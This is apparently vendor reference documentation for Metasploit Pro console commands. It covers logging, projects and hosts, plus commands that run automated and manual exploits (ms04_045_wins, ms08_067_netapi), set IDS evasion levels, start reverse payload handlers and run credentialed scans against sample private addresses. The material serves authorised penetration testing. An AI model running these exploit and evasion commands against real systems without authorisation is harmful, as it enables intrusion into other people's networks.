Managing Metasploit
Pro Console Commands
This is a list of common Pro Console commands that you can use as a quick reference. If something is not listed here, type help in the console for a list of all options.
Launch Metasploit
The following commands launch and quit Metasploit.
Launch on Windows
$ msf > cd /metasploit
$ msf > console.bat
Launch on Linux
$ msf > cd /opt/metasploit
$ msf > sudo msfpro
Quit
$ msf > quit
See Available Commands
$ msf > help
You can prepend help to any command to see a list of options available.
msf > help handler
Usage: handler [options]
Spin up a Payload Handler as a background job.
OPTIONS:
-H <opt> The RHOST/LHOST to configure the handler for
-P <opt> The RPORT/LPORT to configure the handler for
-e <opt> An Encoder to use for Payload Stage Encoding
-h Help Banner
-n <opt> The custom name to give the handler job
-p <opt> The payload to configure the handler for
-x Shut the Handler down after a session is established
msf > help workspace
Usage:
workspace List workspaces
workspace -v List workspaces verbosely
workspace [name] Switch workspace
workspace -a [name] ... Add workspace(s)
workspace -d [name] ... Delete workspace(s)
workspace -D Delete all workspaces
workspace -r <old> <new> Rename workspace
workspace -h Show this help information
Pro Help Page
These are all the options available from $ msf > help.
msf > help
Core Commands
=============
Command Description
------- -----------
? Help menu
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
exit Exit the console
get Gets the value of a context-specific variable
getg Gets the value of a global variable
grep Grep the output of another command
help Help menu
history Show command history
load Load a framework plugin
quit Exit the console
repeat Repeat a list of commands
route Route traffic through a session
save Saves the active datastores
sessions Dump session listings and display information about sessions
set Sets a context-specific variable to a value
setg Sets a global variable to a value
sleep Do nothing for the specified number of seconds
spool Write console output into a file as well the screen
threads View and manipulate background threads
unload Unload a framework plugin
unset Unsets one or more context-specific variables
unsetg Unsets one or more global variables
version Show the framework and console library version numbers
Module Commands
===============
Command Description
------- -----------
advanced Displays advanced options for one or more modules
back Move back from the current context
info Displays information about one or more modules
loadpath Searches for and loads modules from a path
options Displays global options or for one or more modules
popm Pops the latest module off the stack and makes it active
previous Sets the previously loaded module as the current module
pushm Pushes the active or list of modules onto the module stack
reload_all Reloads all modules from all defined module paths
search Searches module names and descriptions
show Displays modules of a given type, or all modules
use Interact with a module by name or search term/index
Job Commands
============
Command Description
------- -----------
handler Start a payload handler as job
jobs Displays and manages jobs
kill Kill a job
rename_job Rename a job
Resource Script Commands
========================
Command Description
------- -----------
makerc Save commands entered since start to a file
resource Run the commands stored in a file
Developer Commands
==================
Command Description
------- -----------
edit Edit the current module or a file with the preferred editor
irb Open an interactive Ruby shell in the current context
log Display framework.log paged to the end if possible
pry Open the Pry debugger on the current module or Framework
reload_lib Reload Ruby library files from specified paths
Database Backend Commands
=========================
Command Description
------- -----------
analyze Analyze database information about a specific address or address range
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces
Credentials Backend Commands
============================
Command Description
------- -----------
creds List all credentials in the database
Logs
The following commands allow you to control the logging from Metasploit Pro.
Logging Input and Output from the Console
Use the ConsoleLogging option to store information that the Pro Console inputs and outputs into a log.
msf-pro > setg ConsoleLogging y
Console logging is now enabled.
Changing the Log Verbosity
Use the LogLevel option to set the verbosity of the logs. Set the value between 1 and 5.
msf-pro > setg LogLevel 3
LogLevel => 3
Logging Input and Output for a Session
Use the SessionLogging option to store information that msfconsole inputs and outputs about a session into a log.
msf-pro > setg SessionLogging y
Session logging will be enabled for future sessions.
Users
The following commands relate to user management.
Change the Current User
Use the pro_user command and supply the user name as the argument to change the current user.
msf-pro > pro_user joe
[*] Changed pro_user to joe
View a List of Users
Use the pro_user command and the -l option to view a list of users.
msf-pro > pro_user -l
Username Full Name Email Admin?
======== ========= ===== ======
joe
john
Running Services
To stop, start, or restart services, use the ctlscript.sh script.
msadmin@ubuntu:~$ sudo '/opt/metasploit/ctlscript.sh'
usage: /opt/metasploit/ctlscript.sh help
/opt/metasploit/ctlscript.sh (start|stop|restart|status)
/opt/metasploit/ctlscript.sh (start|stop|restart|status) postgresql
/opt/metasploit/ctlscript.sh (start|stop|restart|status) prosvc
/opt/metasploit/ctlscript.sh (start|stop|restart|status) metasploit
/opt/metasploit/ctlscript.sh (start|stop|restart|status) worker
help - this screen
start - start the service(s)
stop - stop the service(s)
restart - restart or start the service(s)
status - show the status of the service(s)
To Start
To start Metasploit:
/opt/metasploit/ctlscript.sh start
To start a specific service:
/opt/metasploit/ctlscript.sh start worker
Chain Commands
Use the -- -x argument to chain commands together. This works only when launching Metasploit Pro; the argument does not work in an existing Metasploit Pro session. Use ; to separate the commands in the chain.
$ sudo /opt/metasploit/msfpro -- -x 'setg lhost 1.2.3.4'
$ sudo /opt/metasploit/msfpro -- -x 'use multi/handler; set lport 3333; set lhost eth0'
If you omit the extra two dashes in -- -x, the command fails with the error invalid option: -x (OptionParser::InvalidOption).
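The launch-time chaining described above, combined with the options from the Logs section so that every console launch starts with logging on. This is an added example, not Rapid7's own code: the function name build_msfpro_launch is hypothetical, and the msfpro path is the one shown on this page. It goes slightly beyond the page by rejecting commands that would collide with the ; separator or the surrounding single quotes.

```shell
#!/bin/sh
# Added example: compose an msfpro launch line that enables logging before
# any operator-supplied console commands run.
# build_msfpro_launch is a hypothetical helper name, not a Metasploit command.

MSFPRO="/opt/metasploit/msfpro"   # install path as shown on this page

# Console commands from the Logs section that switch the audit trail on.
LOGGING_CMDS="setg ConsoleLogging y; setg SessionLogging y; setg LogLevel 3"

build_msfpro_launch() {
    chain="$LOGGING_CMDS"
    for cmd in "$@"; do
        case "$cmd" in
            "")
                echo "refusing empty command" >&2
                return 1 ;;
            *\;*)
                # ';' is the chain separator, so it cannot appear inside one command
                echo "command contains ';': $cmd" >&2
                return 1 ;;
            *\'*)
                # the whole chain is wrapped in single quotes for the shell
                echo "command contains a single quote: $cmd" >&2
                return 1 ;;
        esac
        chain="$chain; $cmd"
    done
    # '--' must come before -x; without it the launcher fails with
    # "invalid option: -x (OptionParser::InvalidOption)".
    printf "sudo %s -- -x '%s'\n" "$MSFPRO" "$chain"
}

# Constructed sample input: two commands taken from this page.
build_msfpro_launch "setg lhost 1.2.3.4" "pro_project HR"
```

The function only prints the command line, so it can be reviewed or written into a runbook before anyone runs it.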
Exploits
These commands are related to automated exploits and manual exploits.
Automated Exploits
Automated exploits choose the exploit based on host and vulnerability data.
Run an Automated Exploit
Pass in the host IP address as the option.
msf-pro > pro_exploit 192.168.184.139
Define a Host Blacklist for an Automated Exploit
Use the -b option to define a blacklist.
msf-pro > pro_exploit 192.168.184.0/24 -b 192.168.184.138
Define a Port Blacklist for an Automated Exploit
Use the -pb option to specify a list of ports to exclude.
msf-pro > pro_exploit 192.168.184.0/24 -pb 22-23
Perform a Dry Run of an Automated Exploit
Use the -d option to perform a dry run of the automated exploit.
msf-pro > pro_exploit 192.168.184.0/24 -d
Set the Application Evasion Level for an Automated Exploit
Use the -ea option to set the evasion level for an automated exploit. You can assign an evasion level of ‘none’, ‘low’, ‘medium’, or ‘high’.
msf-pro > pro_exploit 192.168.184.0/24 -ea low
Set the TCP Evasion Level
Use the -et option to set the TCP evasion level. You can assign an evasion level of ‘none’, ‘low’, ‘medium’, or ‘high’.
msf-pro > pro_exploit 192.168.184.0/24 -et low
Set the Payload Connection Type
Use the -m option to set the payload type for an automated exploit. The payload types are auto, bind, and reverse.
msf-pro > pro_exploit 192.168.184.0/24 -m bind
Set the Minimum Rank
Use the -r option to set the minimum rank for an automated exploit. The minimum rank settings are ‘low’, ‘average’, ‘normal’, ‘good’, ‘great’, and ‘excellent’.
msf-pro > pro_exploit 192.168.184.0/24 -r good
Manual Exploits
Manual exploits are exploits that you configure to run against a target.
Search
Use the search command along with a search operator to search for a module.
msf-pro > search platform:Windows
msf-pro > search type:exploit
msf-pro > search author:hd
msf-pro > search app:client
msf-pro > search name:ms08-067
Show All Exploit Modules
Use the show command to view a list of the exploits that are available. This command will take a long time since there are thousands of exploit modules available.
msf-pro > show exploits
Load a Module
Use the use command to load an exploit module.
msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) >
Reset the Command Prompt
Use the back command to reset the prompt and to remove the module that is currently loaded.
msf-pro exploit (ms04_045_wins) > back
msf-pro >
Show Module Options
Use the show command to view a list of options that are available for a particular module.
msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) > show options
Show Required Options
To find out what options are required, you can use the show missing command.
msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) > show missing
Show Advanced Options
Use the show command to view a list of advanced options that are available for an exploit module.
msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) > show advanced
Set Options
Use the set command to configure options for a module. You need to specify the option name and the option value, as shown below:
msf-pro exploit (ms04_045_wins) > show options
Name Current Setting Required Description
---- ------- ------- -------- ------------
RHOST
RPORT 445
msf-pro exploit (ms04_045_wins) > set RHOST 192.168.55.1
Show Module Targets
Use the show targets command to view a list of potentially vulnerable targets.
msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) > show targets
Exploit targets:
Id Name
-- -----
0 Windows 2000 English
Check Target Vulnerability
Use the check command to determine if a target is vulnerable to a particular exploit.
msf-pro > use exploit/windows/smb/ms08_067_netapi
msf-pro exploit (ms08_067_netapi) > check 192.168.55.1
[+] 192.168.55.1:445 - the target is vulnerable.
Set the Exploit Target
Use the set target command to specify a target for the exploit.
msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) > show targets
Exploit targets:
Id Name
-- -----
0 Windows 2000 English
msf-pro exploit (ms04_045_wins) > set target 0
Run an Exploit
Use the exploit or run command to run an exploit module.
msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) > run
Reload an Exploit
Use the reload command to refresh the metadata and methods for an exploit.
msf-pro exploit (ms04_045_wins) > reload
Host
The following commands are related to hosts.
Discovery Scan
Use the pro_discover command to perform a discovery scan.
msf-pro > pro_discover 192.168.0.1
Run a Credentialed Scan
Use the following command if you have SMB credentials that you want to specify for Windows hosts.
-sd option defines the SMB domain.
-su option specifies the user name.
-sp option specifies the password.
msf-pro > pro_discover 192.168.0.1 -sd workgroup -su root -sp root
View Hosts
Use the hosts command to view a list of hosts that the database contains.
msf-pro > hosts
Add a Host
Use the hosts command and the -a option to add a host to the current workspace.
msf-pro > hosts -a 192.168.0.3
Delete a Host
Use the hosts command and the -d option to delete a host from the current workspace:
msf-pro > hosts -d 192.168.0.3
Connect to a Host
Use the connect command to communicate with a host. You must supply the host address and port that you want to connect to.
msf-pro > connect 192.168.0.1 22
View Hosts That Are Up
Use the hosts command and the -u option to view a list of hosts that are up.
msf-pro > hosts -u
Projects
The following commands are related to managing projects in Metasploit Pro.
Create a Project
Use the pro_project command and the -a option to create a project. The project that you create becomes the current project.
msf-pro > pro_project -a HR
View the Current Project
Use the pro_project command to view the current project.
msf-pro > pro_project
Change Project
Use the pro_project command to change the current project.
If you need to specify a project that contains spaces, you must enclose the project name in quotes. For example, use pro_project "IT Dept".
msf-pro > pro_project HR
Delete a Project
Use the -d option to delete a project. This deletes the project, which includes the hosts, credentials, evidence, and any other data related to the project.
msf-pro > pro_project -d ACC